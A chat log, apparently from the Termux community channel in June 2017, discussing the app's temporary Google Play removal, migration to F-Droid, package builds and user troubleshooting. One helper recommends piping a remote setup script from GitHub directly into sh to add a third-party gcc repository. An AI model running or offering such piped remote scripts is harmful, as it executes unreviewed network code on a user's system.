2017-06-07 19:41:33 ParkerR Aww twf did the PLay Store banhammer hit here too? :( (I assume because downloading code outside the store)
2017-06-07 19:41:34 ParkerR *wtf
2017-06-07 19:43:43 sdrausty https://plus.google.com/+StevenBrownottaky/posts/Lziy6NQmrzX
2017-06-07 19:43:44 ParkerR sdrausty, rods-tab3 gitter1 Google has been removing applications that loads executable code not from the store ie the userland tools Termux uses
2017-06-07 19:43:58 ParkerR *load
2017-06-07 19:44:20 sdrausty “The following are explicitly prohibited:
2017-06-07 19:44:20 sdrausty Apps or SDKs that download executable code, such as dex files or native code, from a source other than Google Play.”
2017-06-07 19:44:23 ParkerR Or the link sdrausty posted :) Better explains it
2017-06-07 19:45:09 ParkerR I’ve seen a cople other applications hit too
2017-06-07 19:45:13 ParkerR *couple
2017-06-07 19:46:28 ParkerR Thanksfully FDroid has everything :)
2017-06-07 19:46:37 ParkerR *Thankfully. I swear I can’t type today
2017-06-07 19:48:31 rods-tab3 yea BIGLY BAD – but some fdroid out of date - eg busybox
2017-06-07 19:54:18 sdrausty https://f-droid.org/repository/browse/?fdfilter=Termux
2017-06-07 20:07:36 rod-yolo [15:18] (rods-tab3) the droid seems to have it; is 0.50 the latest ? https://f-droid.org/repository/browse/?fdid=com.termux
2017-06-07 20:10:29 live_the_dream_s .51 is latest..
2017-06-07 20:11:26 gitter1 (sdrausty) Version 0.50 - Added on 2017-05-22
2017-06-07 21:07:13 rods-tab3 how tell ? nojoy termux-info
2017-06-07 21:34:51 rods-tab3 where/what is the termux executable ?
2017-06-07 21:36:40 sdrausty Other linux apps that do this are still up on Google Play.
2017-06-07 22:18:11 gitter1 (vishalbiswas) This is shit. There should be an opt-in for users to allow such apps instead of banning them globally.
2017-06-07 22:19:56 gitter1 (sdrausty) Can not believe all those raving reviews are gone now.
2017-06-07 22:21:09 gitter1 (sdrausty) Other linux apps that behave similarly are up and running on Google Play Store.
2017-06-07 22:22:15 rods-tab3 they have to protect the masses from themselves.
2017-06-07 22:22:19 gitter1 (vishalbiswas) @sdrausty Probably not. Is terminal-ide still up?
2017-06-07 22:23:29 gitter1 (vishalbiswas) Too bad there’s no store listing for play store. I’m in a real good mood to post the worst review about the play store
2017-06-07 22:24:00 rods-tab3 just a terminal app would be ok, as long as no download eg ftp
2017-06-07 22:24:50 gitter1 (sdrausty) @vishalbiswas Terminal is ready to be installed along with a slew of apps that download goodies.
2017-06-07 22:24:54 gitter1 (vishalbiswas) Terminal IDE is available. So why is Termux blocked
2017-06-07 22:25:26 gitter1 (sdrausty) @vishalbiswas https://plus.google.com/+StevenBrownottaky/posts/Lziy6NQmrzX
2017-06-07 22:25:36 gitter1 (vishalbiswas) Does anybody know how could we find out? Contact play store?
2017-06-07 22:26:25 rods-tab3 his url explains it
2017-06-07 22:26:41 gitter1 (sdrausty) https://www.change.org/start-a-petition
2017-06-07 22:27:54 gitter1 (sdrausty) I enjoyed reading the reviews of Termux on Google Play. How about you?
2017-06-07 22:28:26 gitter1 (sdrausty) Did you enjoy reading them, too?
2017-06-07 22:35:07 gitter1 (vishalbiswas) @sdrausty f-droid doesn’t have reviews. You must be in boredom hell now
2017-06-07 22:41:56 rods-tab3 can f-droid update termux ? or just install it ?
2017-06-07 22:51:42 gitter1 (vishalbiswas) if you have the play store version installed, you’ll have to uninstall and reinstall from f-droid (thereby losing all data). after that you can just upgrade termux from f-droid
2017-06-07 22:56:34 rods-tab3 great ..
2017-06-07 22:59:27 gitter1 (sdrausty) zip
up the important stuff to backup before migrating.
2017-06-07 23:00:05 gitter1 (vishalbiswas) tar.xz
is better. it prevents perms
2017-06-07 23:06:49 rods-tab3 so do you have to re-install all apps also ? (apps from termux: apt install …)
2017-06-07 23:07:01 gitter1 (vishalbiswas) yes
2017-06-07 23:08:41 gitter1 (sdrausty) 647 packages that are available for arm computer architecture for Termux on Android as of 2017-06-06. https://sdrausty.github.io/pages/more.html
2017-06-07 23:33:27 rods-tab3 is there changelog for 0.49->0.50->0.51 ?
2017-06-07 23:37:16 sdrausty rods-tab3: https://github.com/termux/termux-app/releases
2017-06-08 00:08:16 rods-tab3 thanks
2017-06-08 00:52:32 frumpylava @sdrausty: Have you tried building Termux with your BuildAPKs system? Now might be a really good time for that ;)
2017-06-08 00:54:32 sdrausty frumpylava: Tried. Build fails.
2017-06-08 00:55:58 frumpylava sdrausty: Aww… It would be really cool if termux could build itself. What is the error message?
2017-06-08 01:14:25 sdrausty It would be tremendous if it could build itself on device.
2017-06-08 01:42:48 sdrausty ERROR: Unable to open class file src/com/termux/view/R.java: No such file or directory
2017-06-08 03:17:18 gitter1 (fornwall) Termux got pulled from Google Play “because it violates the payments policy”.
2017-06-08 03:17:18 gitter1 (fornwall)
2017-06-08 03:17:18 gitter1 (fornwall) Unfortunately no more specific information were given, but I suspect the donate link in the app description caused the issue. Will read up on the payment policy of google play and submit an updated description without the donate link, so hopefully it will be put back!
2017-06-08 03:26:29 frumpylava @fornwall Well, that does sound at least fixable. I was worried it was becasue of the “an app may not download executable code (e.g. dex, JAR, .so files) from a source other than Google Play” rule.
2017-06-08 04:43:24 fornwall frumpylava: right, that is a tougher one. I wonder if terminal emulators get a freecard there, if one can argue that it’s not the app itself that downloads it, but the user starting processes
2017-06-08 04:44:11 fornwall (if so, for termux, only the initial download would have to be changed to be bundled with the app)
2017-06-08 04:49:15 frumpylava fornwall: I hope google just looks the other way. Maybe they only enforce the rule when the app is behaving against google’s interest.
2017-06-08 04:50:19 fornwall I guess bundling the initial install files (bash/dpkg/apt/etc) with the app should be a good first step - increasing the app size with around 2 mb is not that hard
2017-06-08 04:52:30 fornwall and then hope that files downloaded on the request by the user, and not initiated by the app itself, get an exception (otherwise google drive, dropbox, gmail attachments, browser downloads, … would need to prevent downloading executable code files, which would be hard)
2017-06-08 04:54:35 frumpylava Good point. Yeah, bundling might be good idea. (altough I rely on the bootstrap zips to be available as a download for my chrooted-termux script, which I do use extensively, so please don’t remove them ;))
2017-06-08 04:59:51 frumpylava But yeah, reading the TOS it was probably the donate link. How dare you accept donations on services other than google?
2017-06-08 05:04:25 fornwall frumpylava: :). I can understand the policy, it’s a slippery slope between donate and scams. though a descriptive warning would have been nice (“please remove the donate link in the app description, otherwise we’ll pull the app in X days”)
2017-06-08 05:04:51 fornwall I’ve submitted an update with the donate link removed now, hopefully it’ll be back soon
2017-06-08 05:08:22 frumpylava Is that true that all f-droid apps have access to each other’s data?
2017-06-08 05:54:02 frumpylava fornwall: By the way, I created a label called “termux-app” in the termux-packages repository for all issues related to the app. It’s probably fruitless to move all the issues to the right repository all the time. I hope that’s fine.
2017-06-08 06:17:15 frumpylava Cool. Termux seems to be back.
2017-06-08 06:17:34 frumpylava ^ @fornwall
2017-06-08 06:23:21 Guest64084 i just want to say thank you to all who support the processing and debugging of this app. its just awesome!!!
2017-06-08 06:53:39 gitter1 (apolbox) #ask
2017-06-08 06:54:07 gitter1 (apolbox) apache2 command not found?
2017-06-08 06:55:48 frumpylava @apolbox Did you install it? packages install apache2
2017-06-08 09:41:26 gitter1 (noncom) no chance to disagree with Guest64084
2017-06-08 09:41:29 gitter1 (noncom) thank you all, all
2017-06-08 10:03:47 djoker67 quit
2017-06-08 10:29:13 djoker67 Hi! I been use Termux for 3 months now. It’s amazing.
2017-06-08 10:29:52 djoker67 Anyone use it for creating Android Apps?
2017-06-08 10:30:22 djoker67 Or have a GUI library usable?
2017-06-08 10:46:40 gitter1 (vishalbiswas) djoker67: contact sdrausty. He has come up with scripts to build android apps
2017-06-08 10:48:26 gitter1 (vishalbiswas) frumpylava: sharing data of all f-droid apps. Sounds insane
2017-06-08 10:51:28 rods-tab3 what does that mean ?
2017-06-08 11:10:06 gitter1 (vishalbiswas) rods-tab3: ?
2017-06-08 11:40:15 rods-tab3 re ‘‘sharing data’’ ??
2017-06-08 11:42:16 gitter1 (vishalbiswas) rods-tab3: internal data of an app accessible to the others. shouldn’t be allowed
2017-06-08 11:48:11 rods-tab3 termux beta still on the store – just updated to 0.51
2017-06-08 11:49:15 gitter1 (vishalbiswas) rods-tab3: it was unbanned
2017-06-08 11:50:04 rods-tab3 the regular termux doesn’t show up on search for ‘‘termux’’
2017-06-08 11:50:41 gitter1 (vishalbiswas) rods-tab3: because you have entered beta
2017-06-08 11:51:03 gitter1 (vishalbiswas) it will only show as beta. you can get the stable one if you exit the beta program
2017-06-08 11:52:02 rods-tab3 ok; how was it unbaned ? since it violates the stores ban on installing outside apps ?
2017-06-08 11:59:17 rods-tab3 termux-info still says version <= 0.48
2017-06-08 12:00:44 gitter1 (vishalbiswas) rods-tab3: thats not a bug. it was planned that termux-api 0.49 would include a feature to get app version but it was never implemented
2017-06-08 12:02:31 rods-tab3 thats a hard thing ??
2017-06-08 12:03:33 rods-tab3 what is the path/name of the main executable ?
2017-06-08 12:04:31 gitter1 (vishalbiswas) rods-tab3: what “main” executable?
2017-06-08 12:05:48 rods-tab3 termux is a program - so i assume there is a file that is loaded when termux is run - path/name of said file ?
2017-06-08 12:07:53 gitter1 (vishalbiswas) do you mean the java entry point into the app or the point at which it drops you into a shell?
2017-06-08 12:09:26 rods-tab3 the app has a file doesn’t it - that is run when you execute termux ?
2017-06-08 12:11:58 gitter1 (vishalbiswas) so you need the entry point of the app itself?
2017-06-08 12:13:46 gitter1 (vishalbiswas) https://github.com/termux/termux-app/blob/master/app/src/main/java/com/termux/app/TermuxActivity.java#L209
2017-06-08 12:13:55 rods-tab3 ie in *nix systems there is an a.out file, in windows somefile.exe – that is brought into memory when you run a program - what path/name does termux have ?
2017-06-08 12:13:55 gitter1 (vishalbiswas) this is where the app starts working
2017-06-08 12:14:08 gitter1 (vishalbiswas) rods-tab3: termux is java
2017-06-08 12:14:45 rods-tab3 but doesnt the java code reside in a file somewhere ?
2017-06-08 12:15:26 gitter1 (vishalbiswas) rods-tab3: you need to learn more about java virtual machines and android app runtime internals
2017-06-08 12:17:24 rods-tab3 too old (2^3)*(3^2) to learn new things
2017-06-08 12:18:20 gitter1 (vishalbiswas) android app life cycle is a little complicated. apps are managed by a daemon and started by “Intent”
2017-06-08 12:19:24 gitter1 (vishalbiswas) another app brodcasts an intent to start an app. the daemon (SystemUI) creates a dalvik vm for it and executes the bytecode from the dex files
2017-06-08 12:20:54 rods-tab3 but when you go to the google store and install a program - there is a file that is downloaded, installed, and then a file is left - if .dex file where is it stored ?
2017-06-08 12:23:01 gitter1 (vishalbiswas) hidden from view. actual apk is stored in /data/app and deodexed java classes are stored in /data/dalvik-cache
2017-06-08 12:32:35 frumpylava rods-tab3: The ban was actually for something else entirely -> Donate link in store description. Google doesn’t care (yet) that termux installs outside code.
2017-06-08 12:32:37 rods-tab3 ok, thanks
2017-06-08 12:33:42 gitter1 (vishalbiswas) frumpylava: php-apache is up https://github.com/termux/termux-packages/pull/1075
2017-06-08 12:35:51 frumpylava @vishalbiswas That’s very cool. thanks
2017-06-08 12:37:45 rods-tab3 how much of the termux price does google take ?
2017-06-08 12:38:35 gitter1 (vishalbiswas) termux is free. only termux::float and termux::tasker have a price tag
2017-06-08 12:39:14 rods-tab3 yea out of that $1.99, asuming google takes some ?
2017-06-08 12:40:31 gitter1 (vishalbiswas) rods-tab3: https://www.quora.com/How-much-does-Google-take-from-Android-game-app-developers-and-Google+-app-game-developers
2017-06-08 12:46:08 rods-tab3 yekes ‘‘You receive 70% of the payment and the remaining 30% goes to the distribution partner and operating fees.’’ <– whats a distribution partner ?
2017-06-08 12:46:35 gitter1 (vishalbiswas) rods-tab3: probably google play
2017-06-08 12:47:34 rods-tab3 guess paypals 3++ percent take is lowest overhead then to donate
2017-06-08 12:48:25 gitter1 (vishalbiswas) paypal has been a blessing for lone developers since forever
2017-06-08 12:52:25 rods-tab3 Patreon would be good except you have to sign up for monthly payments, no one time donation.
2017-06-08 12:54:05 rods-tab3 no idea re bitcoin:1BXS5qPhJzhr5iK5nmNDSmoLDfB6VmN5hv
2017-06-08 12:54:52 gitter1 (vishalbiswas) bitcoins are volatile
2017-06-08 12:56:56 rods-tab3 paypal says pay in KR or USD - does it matter ?
2017-06-08 12:58:10 gitter1 (vishalbiswas) I’m not huge on currency exchange rates…
2017-06-08 12:59:13 rods-tab3 doesnt sweden use the euro currency ? (why did i think he is in finland?)
2017-06-08 12:59:45 frumpylava rods-tab3: No. Sweden does not use the euro
2017-06-08 13:00:35 gitter1 (vishalbiswas) most european countries allow two currencies. their local currency (krona for sweden) and euro
2017-06-08 13:00:50 gitter1 (vishalbiswas) euro is usable throughout the european union
2017-06-08 13:02:36 rods-tab3 bah - paypal now charging 4.2 percent
2017-06-08 13:03:06 gitter1 (vishalbiswas) rods-tab3: they gotta eat, too, you know
2017-06-08 13:07:25 rods-tab3 but also says: ‘‘Funds Availability Date: Jun 14, 2017’’ – why the excessive hold time
2017-06-08 13:33:46 sdrausty rods-tab3: They need time to play too.
2017-06-08 14:01:35 gitter1 (vishalbiswas) @sdrausty I can download ircd-hybrid aarch64 just fine
2017-06-08 14:06:01 sdrausty vishalbiswas: download complete.
2017-06-08 14:19:31 sdrausty @vishalbiswas $ ps aux | grep irc |
2017-06-08 14:19:31 sdrausty u0_a93 2168 0.4 0.1 16160 2952 ? Ss 14:17 0:00 ircd
2017-06-08 14:19:40 sdrausty Thank you.
2017-06-08 14:20:25 gitter1 (vishalbiswas) sdrausty: don’t thank yet. make sure it works (accepts connections)
2017-06-08 14:28:50 sdrausty rods-tab3: https://plus.google.com/112157026023718599976/posts/2qGWEU7k6xf
2017-06-08 14:32:14 sdrausty @vishalbiswas 14:30 !localhost.termux *** Notice – You need to install identd to use this server
2017-06-08 14:35:11 sdrausty I used irssi -c localhost
2017-06-08 19:21:48 sdrausty @vishalbiswas I tried irssi -c 127.0.0.1
and guess what happened?
2017-06-08 19:25:19 rods-tab3 you started talking to yourself ? ::–))
2017-06-08 19:28:10 sdrausty @vishalbiswas My Android device reset. Everything when to reset! All the connections when down while Android was rebooting.
2017-06-08 19:30:12 sdrausty *when/went
2017-06-08 19:33:57 sdrausty I am glad it works now. Let’s get back to building onDevice.
2017-06-08 19:42:40 rods-tab3 bug in irssi
2017-06-08 20:15:14 paradigm The timezone information within a termux-chroot
instance appears incorrect. Anyone know how termux gets its timezone information so that I can try to fix it in the chroot? I tried grepping strace date
output but didn’t see anything promising.
2017-06-08 20:22:52 swift110 hey all
2017-06-08 20:24:04 paradigm greetings, swift110
2017-06-08 20:28:17 swift110 how are you paradigm
2017-06-08 20:28:22 paradigm not to shabby
2017-06-08 20:28:24 swift110 I am trying to learn how to use termux on my phone
2017-06-08 20:28:27 swift110 good
2017-06-08 20:28:48 paradigm if you have a more specific question I might be able to help
2017-06-09 00:22:35 gitter1 (vishalbiswas) @fornwall Wake up. NDK 15 was released. I want to run some builds
2017-06-09 00:45:48 gitter1 (jaytula) @vishalbiswas Does that mean that php-mysql can now be built?
2017-06-09 01:04:20 gitter1 (vishalbiswas) @jaytula thats what I want to test
2017-06-09 01:16:09 gitter1 (jaytula) @vishalbiswas cool. would like to help in anyway.
2017-06-09 01:20:07 gitter1 (jaytula) docker image needs to be updated to use ndk15, is that right?
2017-06-09 08:57:03 frumpylava Does anyone know of a working smtp and imap server? It would be really cool to have an imap server on termux. I could use it with external mail apps.
2017-06-09 11:57:54 Farshid frumpylava: i installed bmon and htop, now which of these is cool https://github.com/dustinkirkland/hollywood/tree/master/lib/hollywood
2017-06-09 11:58:23 Farshid and also i put them in ~/.termux/tasker ?
2017-06-09 12:31:02 gitter1 (vishalbiswas) did i hear dovecot?
2017-06-09 12:31:56 frumpylava @vihalbiswas yeah, tried to quickly compile it, but it doesn’t work out of the box
2017-06-09 12:32:22 gitter1 (vishalbiswas) frumpylava: what’s the blocker?
2017-06-09 12:34:39 frumpylava configure: error: cannot run test program while cross compiling
2017-06-09 12:35:46 gitter1 (vishalbiswas) do me a favor and run configure on your phone, then paste the config.log somewhere
2017-06-09 12:36:09 gitter1 (vishalbiswas) i just need to cross check hardcoded config vars
2017-06-09 12:43:40 gitter1 (vishalbiswas) frumpylava: do you need any of the sql (mariadb, postgres, sqlite) support?
2017-06-09 12:44:44 frumpylava hmm… I’m not sure.
2017-06-09 12:47:30 frumpylava @vishalbiswas http://glow.li/share/config.log
2017-06-09 12:50:10 frumpylava I don’t think I need database access. It’s just for authentication, I think.
2017-06-09 12:50:19 gitter1 (vishalbiswas) frumpylava: only lib_cv_va_val_copy
differs. mine (x86_64) shows no
2017-06-09 12:51:13 frumpylava which means?
2017-06-09 12:53:57 gitter1 (vishalbiswas) /usr/local/google/buildbot/src/android/gcc/toolchain/build/../gcc/gcc-4.9/libgcc/unwind-arm-common.inc:855: error: undefined reference to '__cxa_call_unexpected'
2017-06-09 12:54:03 gitter1 (vishalbiswas) just what I like
2017-06-09 13:20:03 gitter1 (vishalbiswas) frumpylava: has some more roadblocks. will try more tomorrow
2017-06-09 19:13:32 gitter1 (cocodevienne) Uh, guys how do I write Vim plugins and run them? Because the command :py 1
doesn’t work inside of Vim…
2017-06-09 19:13:43 gitter1 (cocodevienne) In Python that is…
2017-06-10 00:33:25 frumpylava @cocodevienne install vim-python
2017-06-10 02:03:06 gitter1 (vishalbiswas) frumpylava: aarch64, right?
2017-06-10 02:04:37 gitter1 (vishalbiswas) frumpylava: https://drive.google.com/open?id=0B8Q4yBRb9PSHalhaZGN0czRZSUk tell me if something goes awry
2017-06-10 02:20:59 frumpylava @vishalbiswas Thanks, I’ll try it out soon, when I have time.
2017-06-10 04:52:13 gitter1 (vishalbiswas) is there a way to change gtk icon directory at compile time?
2017-06-10 06:05:17 gitter1 (vishalbiswas)
2017-06-10 06:05:32 gitter1 (vishalbiswas) gtk3, finally
2017-06-10 06:07:56 gitter1 (prinxy) I can no longer scroll up and down…. Instead of moving up, termux brings out past commands…
2017-06-10 06:10:05 gitter1 (vishalbiswas) live_the_dream: I’ll update the x11 repo tomorrow with all my recent changes and also add some gui apps to test them
2017-06-10 06:10:51 gitter1 (prinxy) Restarting termux solved the problem… Thanks all
2017-06-10 06:24:12 gitter1 (prinxy) How can I access internet from termux
2017-06-10 06:26:26 gitter1 (vishalbiswas) depends on what you want to do. for browsing you can use lynx browser
2017-06-10 06:26:33 gitter1 (vishalbiswas) or elinks
2017-06-10 06:28:52 freeemint Can i have more than open for Termux without buying a plugin?
2017-06-10 06:29:43 freeemint *more than one
2017-06-10 06:30:00 gitter1 (vishalbiswas) freemint: slide from left.
2017-06-10 06:30:09 gitter1 (vishalbiswas) you’ll see a button named new session
2017-06-10 06:30:19 freeemint thx
2017-06-10 06:31:01 gitter1 (prinxy) Thanks @vishalbiswas I want to open my mail
2017-06-10 06:31:28 gitter1 (vishalbiswas) @prinxy “open my mail” in a browser or a mail client? we have mutt
2017-06-10 08:08:07 gitter1 (prinxy) Mutt is giving an error @vishalbiswas …. How do I set up my mail as default for mutt?
2017-06-10 11:00:13 gitter1 (TheDiamondYT1) Sup
2017-06-10 11:01:04 gitter1 (vishalbiswas) @TheDiamondYT1 can you confirm whether export JAVA_OPTS="--permit-illegal-access"
fixes that issue with maven?
2017-06-10 11:06:51 gitter1 (TheDiamondYT1) @vishalbiswas Nope. Full log (with -X switch): http://paste.ubuntu.com/24823886/
2017-06-10 11:08:32 gitter1 (vishalbiswas) @TheDiamondYT1 we’ll have to wait for upstream, then, I suppose
2017-06-10 11:08:51 gitter1 (TheDiamondYT1) Isn’t it a lombok error because it accesses the com.sun
classes?
2017-06-10 11:09:29 gitter1 (vishalbiswas) @TheDiamondYT1 java 9 locks down everything. jigsaw
2017-06-10 11:10:12 gitter1 (vishalbiswas) But seriously. Minecraft server?
2017-06-10 11:11:22 gitter1 (TheDiamondYT1) @vishalbiswas First repo i could think of with multiple maven modules
2017-06-10 11:12:59 gitter1 (TheDiamondYT1) And i do like developing for minecraft thats why i cant wait for java to be merged into termux…i’d very much like to create a gitter bridge
2017-06-10 11:14:26 gitter1 (vishalbiswas) @TheDiamondYT1 I have not updated that java build for last two repo updates. Maybe that’s what is causing this failure
2017-06-10 11:15:39 gitter1 (TheDiamondYT1) Maybe
2017-06-10 11:17:46 gitter1 (TheDiamondYT1) @vishalbiswas so basically we need the jre installed to install the jdk?
2017-06-10 11:18:09 gitter1 (vishalbiswas) or u can pass both deb files to the installer
2017-06-10 11:21:42 gitter1 (vishalbiswas) where can I find source code of android’s sdkmanager
utility
2017-06-10 12:07:18 u0_a137 hello everyone ,how to put in Chinese in termux?
2017-06-10 12:35:44 lleo clang 64bits available?
2017-06-10 12:37:48 gitter1 (vishalbiswas) lleo: I’m lost…
2017-06-10 12:41:38 lleo evenin gitter
2017-06-10 12:44:25 gitter1 (mklein994) I’m having trouble with npm: https://gist.github.com/mklein994/c296e5ab4c6dc9765505acb82b97e1b9
2017-06-10 12:44:26 gitter1 (vishalbiswas) lleo: what do you mean by 64 bits?
2017-06-10 12:45:31 gitter1 (mklein994) Does anyone know if npm install -g npm
works properly? Or was some magic dust applied to make it work on Termux?
2017-06-10 12:45:47 lleo gcc -64 , so i can compile a kernel
2017-06-10 12:46:30 gitter1 (vishalbiswas) you mean -m64?
2017-06-10 12:48:55 gitter1 (mklein994) Right now nodejs
comes with npm 3.10.10
. The latest is 5.0.3
. Lots has changed under the hood since then.
2017-06-10 12:49:46 lleo lang: Unknown command line argument ‘-aarch64-fix-cortex-a53-835769=1’. Try: ‘clang -help’
2017-06-10 12:50:51 lleo trying gcc -dumpspecs
2017-06-10 12:54:47 gitter1 (vishalbiswas) lleo: when does it spit that one out?
2017-06-10 12:58:00 lleo simple test program, probable not matching gcc as versions
2017-06-10 13:06:55 lleo clang does not know about dumpspecs?
2017-06-10 13:11:34 lleo clang version 4.0.0
2017-06-10 13:13:31 gitter1 (vishalbiswas) lleo: there is no concept of specs in clang
2017-06-10 13:14:51 lleo specs usually do the cmdlines
2017-06-10 13:15:37 lleo if i find a wifi i’ll update clang
2017-06-10 13:17:10 gitter1 (vishalbiswas) lleo: if you really need gcc, then curl -L https://raw.githubusercontent.com/its-pointless/its-pointless.github.io/master/setup-pointless-repo.sh | sh
2017-06-10 13:17:51 gitter1 (vishalbiswas) this will add another repo to apt. its-pointless (live_the_dream) host gcc as well as other useful apps on his repo
2017-06-10 13:21:08 lleo compiling gcc is funfun
2017-06-10 14:34:35 gitter1 (ToastyMod) um this is my first time using gitter hi
2017-06-10 14:37:06 gitter1 (ToastyMod) termux is really cool guys
2017-06-10 14:37:22 gitter1 (ToastyMod) are you guys thinking of doing anything graphical?
2017-06-10 14:46:37 lleo ok pointless repo is not different in behavioure
2017-06-10 14:49:40 lleo https://github.com/Microsoft/clang/blob/master/test/Driver/aarch64-fix-cortex-a53-835769.c
2017-06-10 14:55:23 lleo clang: backend not aligned version for the frontend for a53 64bits cpus
2017-06-10 15:37:49 bob___ hi
2017-06-10 15:40:25 bob___ any newsbeuter+youtube-dl users?
2017-06-10 15:43:48 bob___ i tried to set a macro to open youtube feeds in youtube-dl with macro y set browser “/data/data/com.termux/files/usr/bin/youtube-dl %u”; open ; set browser “termux-open %u”
2017-06-10 15:50:03 lleo gcc-7 found :) compiling kernel
2017-06-10 15:50:58 bob___ but it doesn’t work :/ it launch fine on the shell directly :/
2017-06-10 16:01:45 Church- bob___: One sec. Got a script for you.
2017-06-10 16:07:18 gitter1 (mklein994) @ToastyMod @vishalbiswas has some stuff going on (iirc) with X11.
2017-06-10 16:07:53 bob___ thanks church
2017-06-10 16:29:27 gitter1 (fornwall) @vishalbiswas I’ll look into ndk r15 tomorrow (the plan is to first add it with the deprecated, non-unified headers as a first step, then transition to unified as the next)
2017-06-10 16:30:00 gitter1 (fornwall) Need to go through libandroid-support, it’s changed a bit in r15
2017-06-10 16:31:13 gitter1 (fornwall) That’s long overdue anyway, as libandroid-support is a bit messy. Should probably create a repo for libandroid-support, so we have better control what it contains and can add things like getpass
2017-06-10 17:01:20 gitter1 (TheDiamondYT1) @vishalbiswas ive been writing a really long script to test with your java PR
2017-06-10 17:02:51 lleo pff
2017-06-10 17:06:19 lleo so far the 64bits android-eabi, i;m off
2017-06-10 18:27:24 gitter1 (TheDiamondYT1) @vishalbiswas https://github.com/TheDiamondYT1/termux-java-test/blob/master/test.sh
2017-06-10 20:14:51 gitter1 (ToastyMod) @mklein994 neat
2017-06-10 23:39:31 gitter1 (vishalbiswas) @TheDiamondYT1 I’ve updated the arm deb file again. Download the 6.8 version and check whether it works
2017-06-11 01:58:38 bob___ hey
2017-06-11 01:59:19 bob___ any newsbeuter+youtube-dl users?
2017-06-11 03:55:40 pr1 Hello
2017-06-11 08:27:14 bob___ o_o
2017-06-11 08:42:00 bob___ anybody out there?
2017-06-11 08:42:44 bob___ tried to link newsbeuter & youtube-dl, the config macro doesn’t seem to work (i used the complete path the the bin), any hint?
2017-06-11 08:44:10 bob___ macro y set browser “/data/data/com.termux/files/usr/bin/youtube-dl %u”; open ; set browser “termux-open %u”
2017-06-11 08:50:23 gitter1 (vishalbiswas) bob___: can you give me a demo rss link to test
2017-06-11 09:04:28 bob___ yes ofc
2017-06-11 09:04:41 bob___ https://motherboard.vice.com/en_us/rss
2017-06-11 09:05:37 gitter1 (vishalbiswas) and one with a youtube link?
2017-06-11 09:06:10 bob___ oh
2017-06-11 09:06:13 bob___ yes that makes sense
2017-06-11 09:06:31 bob___ https://www.youtube.com/feeds/videos.xml?user=EvanKale91
2017-06-11 09:06:32 bob___ haha
2017-06-11 09:14:21 gitter1 (vishalbiswas) bob___: try this macro y set browser "youtube-dl %u"; open-in-browser ; set browser "elinks %u"
2017-06-11 09:15:34 bob___ interesting, so the culprit might be those sneaky quotes
2017-06-11 09:15:50 bob___ thx trying that
2017-06-11 09:16:22 bob___ not copying the ` right?
2017-06-11 09:18:54 gitter1 (vishalbiswas) bob___: yes do not copy `
2017-06-11 09:19:06 bob___ oh the culprit was open-in-browser
2017-06-11 09:21:51 bob___ this is wierd cause on the desktop version “open” works still, it’s good to know, thanks a lot vishalbiswas!
2017-06-11 09:22:17 gitter1 (vishalbiswas) thank archwiki, it was copy pasta
2017-06-11 09:22:49 bob___ https://wiki.archlinux.org/index.php/Newsbeuter
2017-06-11 09:22:52 bob___ yeah i’m reading it now
2017-06-11 09:23:18 bob___ i didn’t think my desktop config could be wrong, i used it for at least 5 years without a problem
2017-06-11 09:23:36 bob___ i should have searched there right away to see if some commands were deprecated
2017-06-11 09:25:20 gitter1 (vishalbiswas) bob___: your desktop one may have worked because you have some other weird configs?
2017-06-11 09:30:40 bob___ now that i think about it, it worked on my desktop but might have stopped working too, i just didn’t notice
2017-06-11 09:30:54 bob___ release notes for newsbeuter are hard to find
2017-06-11 09:31:05 bob___ https://github.com/akrennmair/newsbeuter/releases no info, their blog dates from 2013 :/
2017-06-11 09:36:51 bob___ see the doc still use “open” instead of “open-in-browser” https://newsbeuter.org/doc/newsbeuter.html#_macro_support
2017-06-11 16:58:24 gitter1 (fornwall) the NDK used to build termux packages has been updated to the newly released r15! update docker images with ./scripts/update-docker.sh
2017-06-11 16:59:25 gitter1 (fornwall) it still uses the deprecated, non-unified headers - transitioning to unified headers is the next step
2017-06-11 17:01:50 gitter1 (fornwall) also, the transition to libc++ (that is, a fully functional&updated c++ library) still remains - it may have to wait for NDK r16, as the NDK developers pushed back official support for it (once again..)
2017-06-12 07:17:09 fornwall about newsbeuter: there seems to be a problem with putting out a new release, due to the original developer owning the newsbeuter.org domain not being available anymore
2017-06-12 07:17:10 fornwall https://github.com/akrennmair/newsbeuter/issues/525
2017-06-12 07:17:52 fornwall I asked about packaging up latest master instead as there is active development still happening, and it seems ok
2017-06-12 07:17:59 fornwall any newsbeuter user being for or against it?
2017-06-12 07:26:35 frumpylava I’m for it. Rather build from master than it becoming a patched and backported mess.
2017-06-12 08:28:49 frumpylava fornwall: Wow, look at you tackling all these issues :)
2017-06-12 09:58:31 gitter1 (DemoPBTL) Привет народ
2017-06-12 09:59:20 gitter1 (DemoPBTL) Я может не по теме…. помогите советом пожалуйста.
2017-06-12 10:00:20 gitter1 (DemoPBTL) Тема такая, стоит на Android ruby, как запустить с termux его
2017-06-12 10:00:45 gitter1 (DemoPBTL) Впервые просто столкнулся и с рубином и termux
2017-06-12 10:11:24 gitter1 (noncom) guys, what happened to Termux boot? I can’t find it on Google Play…
2017-06-12 10:12:24 frumpylava @noncom It wasn’t ever released. I think it’s just not finishded/working yet.
2017-06-12 10:28:07 gitter1 (noncom) @DemoPBTL you can install Ruby in Termux just as any other Termux package and use it as you would normally do in a linux
2017-06-12 10:28:22 gitter1 (noncom) @DemoPBTL it is among the available packages: https://github.com/termux/termux-packages/tree/master/packages
2017-06-12 10:33:49 gitter1 (DemoPBTL) Спасибо, пойду попробую))
2017-06-12 12:46:55 Waples_ hello
2017-06-12 12:46:58 Waples_ anyone here?
2017-06-12 12:49:00 gn0me yo
2017-06-12 12:49:04 gn0me got a crash using tmux
2017-06-12 12:49:45 gn0me any of you use this on ‘termux’ thingymajig on a daily basis ?
2017-06-12 12:54:47 gn0me nobody?
2017-06-12 12:56:51 gn0me clear
2017-06-12 12:57:38 gitter1 (vishalbiswas) gn0me: ?
2017-06-12 12:58:19 gn0me using termux atm, bit unstable at times
2017-06-12 12:58:48 gitter1 (vishalbiswas) like?
2017-06-12 13:07:05 escogido_ I would like to respond to volume up/down buttons in an app running in termux. Any ideas? Timing and length of time held are important to me.
2017-06-12 13:07:41 escogido_ I can see the info I need in logcat via a Termux related logging message…
2017-06-12 13:16:29 gitter1 (vishalbiswas) escogido_: there’s no support for it yet. all android user activities are interfaced by termux api and it has a significant latency. you can implement it there if you’re up for it
2017-06-12 13:22:14 escogido_ gitter1: thanks, so maybe capture events and timings from Java/API side and then forward on as a stream of event data say via termux-key-events command line?
